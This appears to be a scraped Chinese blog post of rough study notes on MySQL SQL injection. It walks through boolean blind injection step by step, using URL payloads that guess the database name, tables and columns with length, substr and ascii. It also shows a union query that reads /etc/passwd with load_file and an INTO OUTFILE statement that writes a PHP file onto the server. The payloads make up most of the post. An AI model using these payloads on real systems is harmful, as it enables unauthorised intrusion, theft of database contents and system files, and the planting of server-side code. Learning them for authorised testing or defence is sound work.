mysql 盲注读取文件 mysql 写入文件

最新推荐文章于 2024-07-15 15:01:56 发布

兰兰不懒

最新推荐文章于 2024-07-15 15:01:56 发布

阅读量273

点赞数 1

文章标签： mysql 数据库 database

本文链接：https://blog.csdn.net/weixin_54472394/article/details/125048554

版权

提示：
table_schema = 库名称
table_name = 表名称
column_name = 字段名称

information.schcema库下面有两个表
1，tables = 存放的是所有的库名 + 表名（通过where 库名来获取所有的表）
2，columns = 存放的是所有的列名（通过where 表名来获取所有的字段）

一、sssss

1.union

select * from user where id = 1 union select * from user where id = 2;

字段显示是以第一个查询为准

2.title

1111111111111

1.判断是否存在注入点
2.猜解当前数据库名称，注:需要先猜解数据库名称的长度+3.猜解数据库中的表名，注:需要先猜解数据表名称的长度
4.猜解表中的字段名，注:需要先猜解字段的数量，再猜解字段名称的长度e
5.猜解数据，注:需要先猜解数据的记录数，再对每条记录的长度和数据进行猜解

查询数据库长度 length(‘123’) // 3

?id=1' and length(database()) = 8 --+

查询数据库名称 substr（123，1，1） // 1

?id=1' and substr(database(),1,1) = 's' --+

通过 ascii 把字符转成 ascii 数字查询 ascii(‘s’) = 115 // true

?id=1' and  ascii(substr(database(),1,1)) = 115 --+

查一条语句的长度 length( ( select * from user limit 0,1) )

select length(( select table_name from information_schema.tables where table_schema = database() limit 0,1) )= 6;

查一条语句的z字段 substr( ( select * from user limit 0,1) )

select substr(( select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1) = 'e';

select * from users where id = -1 union select 1,2,load_file('/etc/passwd')\G;

google 吧\G去掉

select '12345,aaaaa6'  into outfile "/var/lib/mysql/fei.php";

关注